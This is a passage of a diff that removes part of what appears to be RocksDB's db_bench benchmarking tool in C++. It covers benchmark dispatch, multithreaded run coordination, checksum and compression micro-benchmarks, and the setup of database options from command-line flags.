-        method = &Benchmark::WriteSeqSeekSeq;
-      } else if (name == "compact") {
-        method = &Benchmark::Compact;
-      } else if (name == "compactall") {
-        CompactAll();
-      } else if (name == "crc32c") {
-        method = &Benchmark::Crc32c;
-      } else if (name == "xxhash") {
-        method = &Benchmark::xxHash;
-      } else if (name == "acquireload") {
-        method = &Benchmark::AcquireLoad;
-      } else if (name == "compress") {
-        method = &Benchmark::Compress;
-      } else if (name == "uncompress") {
-        method = &Benchmark::Uncompress;
-#ifndef ROCKSDB_LITE
-      } else if (name == "randomtransaction") {
-        method = &Benchmark::RandomTransaction;
-        post_process_method = &Benchmark::RandomTransactionVerify;
-#endif  // ROCKSDB_LITE
-      } else if (name == "randomreplacekeys") {
-        fresh_db = true;
-        method = &Benchmark::RandomReplaceKeys;
-      } else if (name == "timeseries") {
-        timestamp_emulator_.reset(new TimestampEmulator());
-        if (FLAGS_expire_style == "compaction_filter") {
-          filter.reset(new ExpiredTimeFilter(timestamp_emulator_));
-          fprintf(stdout, "Compaction filter is used to remove expired data");
-          open_options_.compaction_filter = filter.get();
-        }
-        fresh_db = true;
-        method = &Benchmark::TimeSeries;
-      } else if (name == "stats") {
-        PrintStats("rocksdb.stats");
-      } else if (name == "resetstats") {
-        ResetStats();
-      } else if (name == "verify") {
-        VerifyDBFromDB(FLAGS_truth_db);
-      } else if (name == "levelstats") {
-        PrintStats("rocksdb.levelstats");
-      } else if (name == "sstables") {
-        PrintStats("rocksdb.sstables");
-      } else if (!name.empty()) {  // No error message for empty name
-        fprintf(stderr, "unknown benchmark '%s'\n", name.c_str());
-        exit(1);
-      }
-
-      if (fresh_db) {
-        if (FLAGS_use_existing_db) {
-          fprintf(stdout, "%-12s : skipped (--use_existing_db is true)\n",
-                  name.c_str());
-          method = nullptr;
-        } else {
-          if (db_.db != nullptr) {
-            db_.DeleteDBs();
-            DestroyDB(FLAGS_db, open_options_);
-          }
-          Options options = open_options_;
-          for (size_t i = 0; i < multi_dbs_.size(); i++) {
-            delete multi_dbs_[i].db;
-            if (!open_options_.wal_dir.empty()) {
-              options.wal_dir = GetPathForMultiple(open_options_.wal_dir, i);
-            }
-            DestroyDB(GetPathForMultiple(FLAGS_db, i), options);
-          }
-          multi_dbs_.clear();
-        }
-        Open(&open_options_);  // use open_options for the last accessed
-      }
-
-      if (method != nullptr) {
-        fprintf(stdout, "DB path: [%s]\n", FLAGS_db.c_str());
-        if (num_warmup > 0) {
-          printf("Warming up benchmark by running %d times\n", num_warmup);
-        }
-
-        for (int i = 0; i < num_warmup; i++) {
-          RunBenchmark(num_threads, name, method);
-        }
-
-        if (num_repeat > 1) {
-          printf("Running benchmark for %d times\n", num_repeat);
-        }
-
-        CombinedStats combined_stats;
-        for (int i = 0; i < num_repeat; i++) {
-          Stats stats = RunBenchmark(num_threads, name, method);
-          combined_stats.AddStats(stats);
-        }
-        if (num_repeat > 1) {
-          combined_stats.Report(name);
-        }
-      }
-      if (post_process_method != nullptr) {
-        (this->*post_process_method)();
-      }
-    }
-    if (FLAGS_statistics) {
-      fprintf(stdout, "STATISTICS:\n%s\n", dbstats->ToString().c_str());
-    }
-    if (FLAGS_simcache_size >= 0) {
-      fprintf(stdout, "SIMULATOR CACHE STATISTICS:\n%s\n",
-              static_cast_with_check<SimCache, Cache>(cache_.get())
-                  ->ToString()
-                  .c_str());
-    }
-  }
-
- private:
-  std::shared_ptr<TimestampEmulator> timestamp_emulator_;
-
-  struct ThreadArg {
-    Benchmark* bm;
-    SharedState* shared;
-    ThreadState* thread;
-    void (Benchmark::*method)(ThreadState*);
-  };
-
-  static void ThreadBody(void* v) {
-    ThreadArg* arg = reinterpret_cast<ThreadArg*>(v);
-    SharedState* shared = arg->shared;
-    ThreadState* thread = arg->thread;
-    {
-      MutexLock l(&shared->mu);
-      shared->num_initialized++;
-      if (shared->num_initialized >= shared->total) {
-        shared->cv.SignalAll();
-      }
-      while (!shared->start) {
-        shared->cv.Wait();
-      }
-    }
-
-    SetPerfLevel(static_cast<PerfLevel> (shared->perf_level));
-    thread->stats.Start(thread->tid);
-    (arg->bm->*(arg->method))(thread);
-    thread->stats.Stop();
-
-    {
-      MutexLock l(&shared->mu);
-      shared->num_done++;
-      if (shared->num_done >= shared->total) {
-        shared->cv.SignalAll();
-      }
-    }
-  }
-
-  Stats RunBenchmark(int n, Slice name,
-                     void (Benchmark::*method)(ThreadState*)) {
-    SharedState shared;
-    shared.total = n;
-    shared.num_initialized = 0;
-    shared.num_done = 0;
-    shared.start = false;
-    if (FLAGS_benchmark_write_rate_limit > 0) {
-      shared.write_rate_limiter.reset(
-          NewGenericRateLimiter(FLAGS_benchmark_write_rate_limit));
-    }
-    if (FLAGS_benchmark_read_rate_limit > 0) {
-      shared.read_rate_limiter.reset(NewGenericRateLimiter(
-          FLAGS_benchmark_read_rate_limit, 100000 /* refill_period_us */,
-          10 /* fairness */, RateLimiter::Mode::kReadsOnly));
-    }
-
-    std::unique_ptr<ReporterAgent> reporter_agent;
-    if (FLAGS_report_interval_seconds > 0) {
-      reporter_agent.reset(new ReporterAgent(FLAGS_env, FLAGS_report_file,
-                                             FLAGS_report_interval_seconds));
-    }
-
-    ThreadArg* arg = new ThreadArg[n];
-
-    for (int i = 0; i < n; i++) {
-#ifdef NUMA
-      if (FLAGS_enable_numa) {
-        // Performs a local allocation of memory to threads in numa node.
-        int n_nodes = numa_num_task_nodes();  // Number of nodes in NUMA.
-        numa_exit_on_error = 1;
-        int numa_node = i % n_nodes;
-        bitmask* nodes = numa_allocate_nodemask();
-        numa_bitmask_clearall(nodes);
-        numa_bitmask_setbit(nodes, numa_node);
-        // numa_bind() call binds the process to the node and these
-        // properties are passed on to the thread that is created in
-        // StartThread method called later in the loop.
-        numa_bind(nodes);
-        numa_set_strict(1);
-        numa_free_nodemask(nodes);
-      }
-#endif
-      arg[i].bm = this;
-      arg[i].method = method;
-      arg[i].shared = &shared;
-      arg[i].thread = new ThreadState(i);
-      arg[i].thread->stats.SetReporterAgent(reporter_agent.get());
-      arg[i].thread->shared = &shared;
-      FLAGS_env->StartThread(ThreadBody, &arg[i]);
-    }
-
-    shared.mu.Lock();
-    while (shared.num_initialized < n) {
-      shared.cv.Wait();
-    }
-
-    shared.start = true;
-    shared.cv.SignalAll();
-    while (shared.num_done < n) {
-      shared.cv.Wait();
-    }
-    shared.mu.Unlock();
-
-    // Stats for some threads can be excluded.
-    Stats merge_stats;
-    for (int i = 0; i < n; i++) {
-      merge_stats.Merge(arg[i].thread->stats);
-    }
-    merge_stats.Report(name);
-
-    for (int i = 0; i < n; i++) {
-      delete arg[i].thread;
-    }
-    delete[] arg;
-
-    return merge_stats;
-  }
-
-  void Crc32c(ThreadState* thread) {
-    // Checksum about 500MB of data total
-    const int size = 4096;
-    const char* label = "(4K per op)";
-    std::string data(size, 'x');
-    int64_t bytes = 0;
-    uint32_t crc = 0;
-    while (bytes < 500 * 1048576) {
-      crc = crc32c::Value(data.data(), size);
-      thread->stats.FinishedOps(nullptr, nullptr, 1, kCrc);
-      bytes += size;
-    }
-    // Print so result is not dead
-    fprintf(stderr, "... crc=0x%x\r", static_cast<unsigned int>(crc));
-
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(label);
-  }
-
-  void xxHash(ThreadState* thread) {
-    // Checksum about 500MB of data total
-    const int size = 4096;
-    const char* label = "(4K per op)";
-    std::string data(size, 'x');
-    int64_t bytes = 0;
-    unsigned int xxh32 = 0;
-    while (bytes < 500 * 1048576) {
-      xxh32 = XXH32(data.data(), size, 0);
-      thread->stats.FinishedOps(nullptr, nullptr, 1, kHash);
-      bytes += size;
-    }
-    // Print so result is not dead
-    fprintf(stderr, "... xxh32=0x%x\r", static_cast<unsigned int>(xxh32));
-
-    thread->stats.AddBytes(bytes);
-    thread->stats.AddMessage(label);
-  }
-
-  void AcquireLoad(ThreadState* thread) {
-    int dummy;
-    std::atomic<void*> ap(&dummy);
-    int count = 0;
-    void *ptr = nullptr;
-    thread->stats.AddMessage("(each op is 1000 loads)");
-    while (count < 100000) {
-      for (int i = 0; i < 1000; i++) {
-        ptr = ap.load(std::memory_order_acquire);
-      }
-      count++;
-      thread->stats.FinishedOps(nullptr, nullptr, 1, kOthers);
-    }
-    if (ptr == nullptr) exit(1);  // Disable unused variable warning.
-  }
-
-  void Compress(ThreadState *thread) {
-    RandomGenerator gen;
-    Slice input = gen.Generate(FLAGS_block_size);
-    int64_t bytes = 0;
-    int64_t produced = 0;
-    bool ok = true;
-    std::string compressed;
-
-    // Compress 1G
-    while (ok && bytes < int64_t(1) << 30) {
-      compressed.clear();
-      ok = CompressSlice(input, &compressed);
-      produced += compressed.size();
-      bytes += input.size();
-      thread->stats.FinishedOps(nullptr, nullptr, 1, kCompress);
-    }
-
-    if (!ok) {
-      thread->stats.AddMessage("(compression failure)");
-    } else {
-      char buf[340];
-      snprintf(buf, sizeof(buf), "(output: %.1f%%)",
-               (produced * 100.0) / bytes);
-      thread->stats.AddMessage(buf);
-      thread->stats.AddBytes(bytes);
-    }
-  }
-
-  void Uncompress(ThreadState *thread) {
-    RandomGenerator gen;
-    Slice input = gen.Generate(FLAGS_block_size);
-    std::string compressed;
-
-    bool ok = CompressSlice(input, &compressed);
-    int64_t bytes = 0;
-    int decompress_size;
-    while (ok && bytes < 1024 * 1048576) {
-      char *uncompressed = nullptr;
-      switch (FLAGS_compression_type_e) {
-        case rocksdb::kSnappyCompression: {
-          // get size and allocate here to make comparison fair
-          size_t ulength = 0;
-          if (!Snappy_GetUncompressedLength(compressed.data(),
-                                            compressed.size(), &ulength)) {
-            ok = false;
-            break;
-          }
-          uncompressed = new char[ulength];
-          ok = Snappy_Uncompress(compressed.data(), compressed.size(),
-                                 uncompressed);
-          break;
-        }
-      case rocksdb::kZlibCompression:
-        uncompressed = Zlib_Uncompress(compressed.data(), compressed.size(),
-                                       &decompress_size, 2);
-        ok = uncompressed != nullptr;
-        break;
-      case rocksdb::kBZip2Compression:
-        uncompressed = BZip2_Uncompress(compressed.data(), compressed.size(),
-                                        &decompress_size, 2);
-        ok = uncompressed != nullptr;
-        break;
-      case rocksdb::kLZ4Compression:
-        uncompressed = LZ4_Uncompress(compressed.data(), compressed.size(),
-                                      &decompress_size, 2);
-        ok = uncompressed != nullptr;
-        break;
-      case rocksdb::kLZ4HCCompression:
-        uncompressed = LZ4_Uncompress(compressed.data(), compressed.size(),
-                                      &decompress_size, 2);
-        ok = uncompressed != nullptr;
-        break;
-      case rocksdb::kXpressCompression:
-        uncompressed = XPRESS_Uncompress(compressed.data(), compressed.size(),
-          &decompress_size);
-        ok = uncompressed != nullptr;
-        break;
-      case rocksdb::kZSTD:
-        uncompressed = ZSTD_Uncompress(compressed.data(), compressed.size(),
-                                       &decompress_size);
-        ok = uncompressed != nullptr;
-        break;
-      default:
-        ok = false;
-      }
-      delete[] uncompressed;
-      bytes += input.size();
-      thread->stats.FinishedOps(nullptr, nullptr, 1, kUncompress);
-    }
-
-    if (!ok) {
-      thread->stats.AddMessage("(compression failure)");
-    } else {
-      thread->stats.AddBytes(bytes);
-    }
-  }
-
-  // Returns true if the options is initialized from the specified
-  // options file.
-  bool InitializeOptionsFromFile(Options* opts) {
-#ifndef ROCKSDB_LITE
-    printf("Initializing RocksDB Options from the specified file\n");
-    DBOptions db_opts;
-    std::vector<ColumnFamilyDescriptor> cf_descs;
-    if (FLAGS_options_file != "") {
-      auto s = LoadOptionsFromFile(FLAGS_options_file, Env::Default(), &db_opts,
-                                   &cf_descs);
-      if (s.ok()) {
-        *opts = Options(db_opts, cf_descs[0].options);
-        return true;
-      }
-      fprintf(stderr, "Unable to load options file %s --- %s\n",
-              FLAGS_options_file.c_str(), s.ToString().c_str());
-      exit(1);
-    }
-#endif
-    return false;
-  }
-
-  void InitializeOptionsFromFlags(Options* opts) {
-    printf("Initializing RocksDB Options from command-line flags\n");
-    Options& options = *opts;
-
-    assert(db_.db == nullptr);
-
-    options.max_open_files = FLAGS_open_files;
-    if (FLAGS_cost_write_buffer_to_cache || FLAGS_db_write_buffer_size != 0) {
-      options.write_buffer_manager.reset(
-          new WriteBufferManager(FLAGS_db_write_buffer_size, cache_));
-    }
-    options.write_buffer_size = FLAGS_write_buffer_size;
-    options.max_write_buffer_number = FLAGS_max_write_buffer_number;
-    options.min_write_buffer_number_to_merge =
-      FLAGS_min_write_buffer_number_to_merge;
-    options.max_write_buffer_number_to_maintain =
-        FLAGS_max_write_buffer_number_to_maintain;
-    options.max_background_jobs = FLAGS_max_background_jobs;
-    options.max_background_compactions = FLAGS_max_background_compactions;
-    options.max_subcompactions = static_cast<uint32_t>(FLAGS_subcompactions);
-    options.max_background_flushes = FLAGS_max_background_flushes;
-    options.compaction_style = FLAGS_compaction_style_e;
-    options.compaction_pri = FLAGS_compaction_pri_e;
-    options.allow_mmap_reads = FLAGS_mmap_read;
-    options.allow_mmap_writes = FLAGS_mmap_write;
-    options.use_direct_reads = FLAGS_use_direct_reads;
-    options.use_direct_io_for_flush_and_compaction =
-        FLAGS_use_direct_io_for_flush_and_compaction;
-#ifndef ROCKSDB_LITE
-    options.compaction_options_fifo = CompactionOptionsFIFO(
-        FLAGS_fifo_compaction_max_table_files_size_mb * 1024 * 1024,
-        FLAGS_fifo_compaction_allow_compaction, FLAGS_fifo_compaction_ttl);
-#endif  // ROCKSDB_LITE
-    if (FLAGS_prefix_size != 0) {
-      options.prefix_extractor.reset(
-          NewFixedPrefixTransform(FLAGS_prefix_size));
-    }
-    if (FLAGS_use_uint64_comparator) {
-      options.comparator = test::Uint64Comparator();
-      if (FLAGS_key_size != 8) {
-        fprintf(stderr, "Using Uint64 comparator but key size is not 8.\n");
-        exit(1);
-      }
-    }
-    if (FLAGS_use_stderr_info_logger) {
-      options.info_log.reset(new StderrLogger());
-    }
-    options.memtable_huge_page_size = FLAGS_memtable_use_huge_page ? 2048 : 0;
-    options.memtable_prefix_bloom_size_ratio = FLAGS_memtable_bloom_size_ratio;
-    if (FLAGS_memtable_insert_with_hint_prefix_size > 0) {
-      options.memtable_insert_with_hint_prefix_extractor.reset(
-          NewCappedPrefixTransform(
-              FLAGS_memtable_insert_with_hint_prefix_size));
-    }
-    options.bloom_locality = FLAGS_bloom_locality;
-    options.max_file_opening_threads = FLAGS_file_opening_threads;
-    options.new_table_reader_for_compaction_inputs =
-        FLAGS_new_table_reader_for_compaction_inputs;
-    options.compaction_readahead_size = FLAGS_compaction_readahead_size;
-    options.random_access_max_buffer_size = FLAGS_random_access_max_buffer_size;
-    options.writable_file_max_buffer_size = FLAGS_writable_file_max_buffer_size;
-    options.use_fsync = FLAGS_use_fsync;
-    options.num_levels = FLAGS_num_levels;
-    options.target_file_size_base = FLAGS_target_file_size_base;
-    options.target_file_size_multiplier = FLAGS_target_file_size_multiplier;
-    options.max_bytes_for_level_base = FLAGS_max_bytes_for_level_base;
-    options.level_compaction_dynamic_level_bytes =
-        FLAGS_level_compaction_dynamic_level_bytes;
-    options.max_bytes_for_level_multiplier =
-        FLAGS_max_bytes_for_level_multiplier;
-    if ((FLAGS_prefix_size == 0) && (FLAGS_rep_factory == kPrefixHash ||
-                                     FLAGS_rep_factory == kHashLinkedList)) {
-      fprintf(stderr, "prefix_size should be non-zero if PrefixHash or "
-                      "HashLinkedList memtablerep is used\n");
-      exit(1);
-    }
-    switch (FLAGS_rep_factory) {
-      case kSkipList:
-        options.memtable_factory.reset(new SkipListFactory(
-            FLAGS_skip_list_lookahead));
-        break;
-#ifndef ROCKSDB_LITE
-      case kPrefixHash:
-        options.memtable_factory.reset(
-            NewHashSkipListRepFactory(FLAGS_hash_bucket_count));
-        break;
-      case kHashLinkedList:
-        options.memtable_factory.reset(NewHashLinkListRepFactory(
-            FLAGS_hash_bucket_count));
-        break;
-      case kVectorRep:
-        options.memtable_factory.reset(
-          new VectorRepFactory
-        );
-        break;
-      case kCuckoo:
-        options.memtable_factory.reset(NewHashCuckooRepFactory(
-            options.write_buffer_size, FLAGS_key_size + FLAGS_value_size));
-        break;
-#else
-      default:
-        fprintf(stderr, "Only skip list is supported in lite mode\n");
-        exit(1);
-#endif  // ROCKSDB_LITE
-    }
-    if (FLAGS_use_plain_table) {
-#ifndef ROCKSDB_LITE
-      if (FLAGS_rep_factory != kPrefixHash &&
-          FLAGS_rep_factory != kHashLinkedList) {
-        fprintf(stderr, "Waring: plain table is used with skipList\n");
-      }
-
-      int bloom_bits_per_key = FLAGS_bloom_bits;
-      if (bloom_bits_per_key < 0) {
-        bloom_bits_per_key = 0;
-      }
-
-      PlainTableOptions plain_table_options;
-      plain_table_options.user_key_len = FLAGS_key_size;
-      plain_table_options.bloom_bits_per_key = bloom_bits_per_key;
-      plain_table_options.hash_table_ratio = 0.75;
-      options.table_factory = std::shared_ptr<TableFactory>(
-          NewPlainTableFactory(plain_table_options));
-#else
-      fprintf(stderr, "Plain table is not supported in lite mode\n");
-      exit(1);
-#endif  // ROCKSDB_LITE
-    } else if (FLAGS_use_cuckoo_table) {
-#ifndef ROCKSDB_LITE
-      if (FLAGS_cuckoo_hash_ratio > 1 || FLAGS_cuckoo_hash_ratio < 0) {
-        fprintf(stderr, "Invalid cuckoo_hash_ratio\n");
-        exit(1);
-      }
-      rocksdb::CuckooTableOptions table_options;
-      table_options.hash_table_ratio = FLAGS_cuckoo_hash_ratio;
-      table_options.identity_as_first_hash = FLAGS_identity_as_first_hash;
-      options.table_factory = std::shared_ptr<TableFactory>(
-          NewCuckooTableFactory(table_options));
-#else
-      fprintf(stderr, "Cuckoo table is not supported in lite mode\n");
-      exit(1);
-#endif  // ROCKSDB_LITE
-    } else {
-      BlockBasedTableOptions block_based_options;
-      if (FLAGS_use_hash_search) {
-        if (FLAGS_prefix_size == 0) {
-          fprintf(stderr,
-              "prefix_size not assigned when enable use_hash_search \n");
-          exit(1);
-        }
-        block_based_options.index_type = BlockBasedTableOptions::kHashSearch;
-      } else {
-        block_based_options.index_type = BlockBasedTableOptions::kBinarySearch;
-      }
-      if (FLAGS_partition_index_and_filters) {
-        if (FLAGS_use_hash_search) {
-          fprintf(stderr,
-                  "use_hash_search is incompatible with "
-                  "partition_index_and_filters and is ignored");
-        }
-        block_based_options.index_type =
-            BlockBasedTableOptions::kTwoLevelIndexSearch;
-        block_based_options.partition_filters = true;
-        block_based_options.metadata_block_size = FLAGS_metadata_block_size;
-      }
-      if (cache_ == nullptr) {
-        block_based_options.no_block_cache = true;
-      }
-      block_based_options.cache_index_and_filter_blocks =
-          FLAGS_cache_index_and_filter_blocks;
-      block_based_options.pin_l0_filter_and_index_blocks_in_cache =
-          FLAGS_pin_l0_filter_and_index_blocks_in_cache;
-      if (FLAGS_cache_high_pri_pool_ratio > 1e-6) {  // > 0.0 + eps
-        block_based_options.cache_index_and_filter_blocks_with_high_priority =
-            true;
-      }
-      block_based_options.block_cache = cache_;
-      block_based_options.block_cache_compressed = compressed_cache_;
-      block_based_options.block_size = FLAGS_block_size;
-      block_based_options.block_restart_interval = FLAGS_block_restart_interval;
-      block_based_options.index_block_restart_interval =
-          FLAGS_index_block_restart_interval;
-      block_based_options.filter_policy = filter_policy_;
-      block_based_options.format_version = 2;
-      block_based_options.read_amp_bytes_per_bit = FLAGS_read_amp_bytes_per_bit;
-      if (FLAGS_read_cache_path != "") {
-#ifndef ROCKSDB_LITE
-        Status rc_status;
-
-        // Read cache need to be provided with a the Logger, we will put all
-        // reac cache logs in the read cache path in a file named rc_LOG
-        rc_status = FLAGS_env->CreateDirIfMissing(FLAGS_read_cache_path);
-        std::shared_ptr<Logger> read_cache_logger;
-        if (rc_status.ok()) {
-          rc_status = FLAGS_env->NewLogger(FLAGS_read_cache_path + "/rc_LOG",
-                                           &read_cache_logger);
-        }
-
-        if (rc_status.ok()) {
-          PersistentCacheConfig rc_cfg(FLAGS_env, FLAGS_read_cache_path,
-                                       FLAGS_read_cache_size,
-                                       read_cache_logger);
-
-          rc_cfg.enable_direct_reads = FLAGS_read_cache_direct_read;
-          rc_cfg.enable_direct_writes = FLAGS_read_cache_direct_write;
-          rc_cfg.writer_qdepth = 4;
-          rc_cfg.writer_dispatch_size = 4 * 1024;
-
-          auto pcache = std::make_shared<BlockCacheTier>(rc_cfg);
-          block_based_options.persistent_cache = pcache;
-          rc_status = pcache->Open();
-        }
-
-        if (!rc_status.ok()) {
-          fprintf(stderr, "Error initializing read cache, %s\n",
-                  rc_status.ToString().c_str());
-          exit(1);
-        }
-#else
-        fprintf(stderr, "Read cache is not supported in LITE\n");
-        exit(1);
-
-#endif
-      }
-      options.table_factory.reset(
-          NewBlockBasedTableFactory(block_based_options));
-    }
-    if (FLAGS_max_bytes_for_level_multiplier_additional_v.size() > 0) {
-      if (FLAGS_max_bytes_for_level_multiplier_additional_v.size() !=
-          (unsigned int)FLAGS_num_levels) {
-        fprintf(stderr, "Insufficient number of fanouts specified %d\n",
-                (int)FLAGS_max_bytes_for_level_multiplier_additional_v.size());
-        exit(1);
-      }
-      options.max_bytes_for_level_multiplier_additional =
-        FLAGS_max_bytes_for_level_multiplier_additional_v;
-    }
-    options.level0_stop_writes_trigger = FLAGS_level0_stop_writes_trigger;
-    options.level0_file_num_compaction_trigger =
-        FLAGS_level0_file_num_compaction_trigger;
-    options.level0_slowdown_writes_trigger =
-      FLAGS_level0_slowdown_writes_trigger;
-    options.compression = FLAGS_compression_type_e;
-    options.compression_opts.level = FLAGS_compression_level;
-    options.compression_opts.max_dict_bytes = FLAGS_compression_max_dict_bytes;
-    options.WAL_ttl_seconds = FLAGS_wal_ttl_seconds;
-    options.WAL_size_limit_MB = FLAGS_wal_size_limit_MB;
-    options.max_total_wal_size = FLAGS_max_total_wal_size;
-
-    if (FLAGS_min_level_to_compress >= 0) {
-      assert(FLAGS_min_level_to_compress <= FLAGS_num_levels);
-      options.compression_per_level.resize(FLAGS_num_levels);
-      for (int i = 0; i < FLAGS_min_level_to_compress; i++) {
-        options.compression_per_level[i] = kNoCompression;
-      }
-      for (int i = FLAGS_min_level_to_compress;
-           i < FLAGS_num_levels; i++) {
-        options.compression_per_level[i] = FLAGS_compression_type_e;
-      }
-    }
-    options.soft_rate_limit = FLAGS_soft_rate_limit;
-    options.hard_rate_limit = FLAGS_hard_rate_limit;
-    options.soft_pending_compaction_bytes_limit =
-        FLAGS_soft_pending_compaction_bytes_limit;
-    options.hard_pending_compaction_bytes_limit =
-        FLAGS_hard_pending_compaction_bytes_limit;
-    options.delayed_write_rate = FLAGS_delayed_write_rate;
-    options.allow_concurrent_memtable_write =
-        FLAGS_allow_concurrent_memtable_write;
-    options.enable_write_thread_adaptive_yield =
-        FLAGS_enable_write_thread_adaptive_yield;
-    options.enable_pipelined_write = FLAGS_enable_pipelined_write;
-    options.write_thread_max_yield_usec = FLAGS_write_thread_max_yield_usec;
-    options.write_thread_slow_yield_usec = FLAGS_write_thread_slow_yield_usec;
-    options.rate_limit_delay_max_milliseconds =
-      FLAGS_rate_limit_delay_max_milliseconds;
-    options.table_cache_numshardbits = FLAGS_table_cache_numshardbits;
-    options.max_compaction_bytes = FLAGS_max_compaction_bytes;
-    options.disable_auto_compactions = FLAGS_disable_auto_compactions;
-    options.optimize_filters_for_hits = FLAGS_optimize_filters_for_hits;
-
-    // fill storage options
-    options.advise_random_on_open = FLAGS_advise_random_on_open;
-    options.access_hint_on_compaction_start = FLAGS_compaction_fadvice_e;
-    options.use_adaptive_mutex = FLAGS_use_adaptive_mutex;
-    options.bytes_per_sync = FLAGS_bytes_per_sync;
-    options.wal_bytes_per_sync = FLAGS_wal_bytes_per_sync;
-
-    // merge operator options
-    options.merge_operator = MergeOperators::CreateFromStringId(
-        FLAGS_merge_operator);
-    if (options.merge_operator == nullptr && !FLAGS_merge_operator.empty()) {
-      fprintf(stderr, "invalid merge operator: %s\n",
-              FLAGS_merge_operator.c_str());
-      exit(1);
-    }
-    options.max_successive_merges = FLAGS_max_successive_merges;
-    options.report_bg_io_stats = FLAGS_report_bg_io_stats;
-
-    // set universal style compaction configurations, if applicable
-    if (FLAGS_universal_size_ratio != 0) {
-      options.compaction_options_universal.size_ratio =
-        FLAGS_universal_size_ratio;
-    }
-    if (FLAGS_universal_min_merge_width != 0) {
-      options.compaction_options_universal.min_merge_width =
-        FLAGS_universal_min_merge_width;
-    }
-    if (FLAGS_universal_max_merge_width != 0) {
-      options.compaction_options_universal.max_merge_width =
-        FLAGS_universal_max_merge_width;
-    }
-    if (FLAGS_universal_max_size_amplification_percent != 0) {
-      options.compaction_options_universal.max_size_amplification_percent =
-        FLAGS_universal_max_size_amplification_percent;
-    }
-    if (FLAGS_universal_compression_size_percent != -1) {
-      options.compaction_options_universal.compression_size_percent =
-        FLAGS_universal_compression_size_percent;
-    }
-    options.compaction_options_universal.allow_trivial_move =
-        FLAGS_universal_allow_trivial_move;
-    if (FLAGS_thread_status_per_interval > 0) {
-      options.enable_thread_tracking = true;
-    }
-    if (FLAGS_rate_limiter_bytes_per_sec > 0) {
-      if (FLAGS_rate_limit_bg_reads &&
-          !FLAGS_new_table_reader_for_compaction_inputs) {
-        fprintf(stderr,
-                "rate limit compaction reads must have "
-                "new_table_reader_for_compaction_inputs set\n");
-        exit(1);
-      }
-      options.rate_limiter.reset(NewGenericRateLimiter(
-          FLAGS_rate_limiter_bytes_per_sec, 100 * 1000 /* refill_period_us */,
-          10 /* fairness */,
-          FLAGS_rate_limit_bg_reads ? RateLimiter::Mode::kReadsOnly
-                                    : RateLimiter::Mode::kWritesOnly));
-    }
-
-#ifndef ROCKSDB_LITE
-    if (FLAGS_readonly && FLAGS_transaction_db) {
-      fprintf(stderr, "Cannot use readonly flag with transaction_db\n");
-      exit(1);
-    }
-#endif  // ROCKSDB_LITE
-
-  }
-
-  void InitializeOptionsGeneral(Options* opts) {
-    Options& options = *opts;
-
-    options.create_missing_column_families = FLAGS_num_column_families > 1;
-    options.statistics = dbstats;
-    options.wal_dir = FLAGS_wal_dir;
-    options.create_if_missing = !FLAGS_use_existing_db;
-    options.dump_malloc_stats = FLAGS_dump_malloc_stats;
-
-    if (FLAGS_row_cache_size) {
-      if (FLAGS_cache_numshardbits >= 1) {
-        options.row_cache =
-            NewLRUCache(FLAGS_row_cache_size, FLAGS_cache_numshardbits);
-      } else {
-        options.row_cache = NewLRUCache(FLAGS_row_cache_size);
-      }
-    }
-    if (FLAGS_enable_io_prio) {
-      FLAGS_env->LowerThreadPoolIOPriority(Env::LOW);
-      FLAGS_env->LowerThreadPoolIOPriority(Env::HIGH);
-    }
-    options.env = FLAGS_env;
-
-    if (FLAGS_num_multi_db <= 1) {
-      OpenDb(options, FLAGS_db, &db_);
-    } else {
-      multi_dbs_.clear();
-      multi_dbs_.resize(FLAGS_num_multi_db);
-      auto wal_dir = options.wal_dir;
-      for (int i = 0; i < FLAGS_num_multi_db; i++) {
-        if (!wal_dir.empty()) {
-          options.wal_dir = GetPathForMultiple(wal_dir, i);
-        }
-        OpenDb(options, GetPathForMultiple(FLAGS_db, i), &multi_dbs_[i]);
-      }
-      options.wal_dir = wal_dir;
-    }
-  }
-
-  void Open(Options* opts) {
-    if (!InitializeOptionsFromFile(opts)) {
-      InitializeOptionsFromFlags(opts);
-    }
-
-    InitializeOptionsGeneral(opts);
-  }
-
-  void OpenDb(Options options, const std::string& db_name,
-      DBWithColumnFamilies* db) {
-    Status s;
-    // Open with column families if necessary.
-    if (FLAGS_num_column_families > 1) {
-      size_t num_hot = FLAGS_num_column_families;
-      if (FLAGS_num_hot_column_families > 0 &&
-          FLAGS_num_hot_column_families < FLAGS_num_column_families) {
-        num_hot = FLAGS_num_hot_column_families;
-      } else {
-        FLAGS_num_hot_column_families = FLAGS_num_column_families;
-      }
-      std::vector<ColumnFamilyDescriptor> column_families;
-      for (size_t i = 0; i < num_hot; i++) {
-        column_families.push_back(ColumnFamilyDescriptor(
-              ColumnFamilyName(i), ColumnFamilyOptions(options)));
-      }
-      std::vector<int> cfh_idx_to_prob;
-      if (!FLAGS_column_family_distribution.empty()) {
-        std::stringstream cf_prob_stream(FLAGS_column_family_distribution);
-        std::string cf_prob;
-        int sum = 0;
-        while (std::getline(cf_prob_stream, cf_prob, ',')) {
-          cfh_idx_to_prob.push_back(std::stoi(cf_prob));
-          sum += cfh_idx_to_prob.back();
-        }
-        if (sum != 100) {
-          fprintf(stderr, "column_family_distribution items must sum to 100\n");
-          exit(1);
-        }
-        if (cfh_idx_to_prob.size() != num_hot) {
-          fprintf(stderr,
-                  "got %" ROCKSDB_PRIszt
-                  " column_family_distribution items; expected "
-                  "%" ROCKSDB_PRIszt "\n",
-                  cfh_idx_to_prob.size(), num_hot);
-          exit(1);
-        }
-      }
-#ifndef ROCKSDB_LITE
-      if (FLAGS_readonly) {
-        s = DB::OpenForReadOnly(options, db_name, column_families,
-            &db->cfh, &db->db);
-      } else if (FLAGS_optimistic_transaction_db) {
-        s = OptimisticTransactionDB::Open(options, db_name, column_families,
-                                          &db->cfh, &db->opt_txn_db);
-        if (s.ok()) {
-          db->db = db->opt_txn_db->GetBaseDB();
-        }
-      } else if (FLAGS_transaction_db) {
-        TransactionDB* ptr;
-        TransactionDBOptions txn_db_options;
-        s = TransactionDB::Open(options, txn_db_options, db_name,
-                                column_families, &db->cfh, &ptr);
-        if (s.ok()) {
-          db->db = ptr;
-        }
-      } else {
-        s = DB::Open(options, db_name, column_families, &db->cfh, &db->db);
-      }
-#else
-      s = DB::Open(options, db_name, column_families, &db->cfh, &db->db);
-#endif  // ROCKSDB_LITE
-      db->cfh.resize(FLAGS_num_column_families);
-      db->num_created = num_hot;
-      db->num_hot = num_hot;
-      db->cfh_idx_to_prob = std::move(cfh_idx_to_prob);
-#ifndef ROCKSDB_LITE
-    } else if (FLAGS_readonly) {
